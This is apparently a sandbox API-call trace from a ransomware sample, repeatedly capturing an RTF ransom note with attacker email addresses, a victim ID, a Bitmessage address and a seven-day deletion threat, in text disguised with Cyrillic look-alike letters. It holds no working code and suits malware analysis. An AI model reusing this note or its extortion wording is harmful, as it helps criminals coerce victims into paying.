g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.316] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.316] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 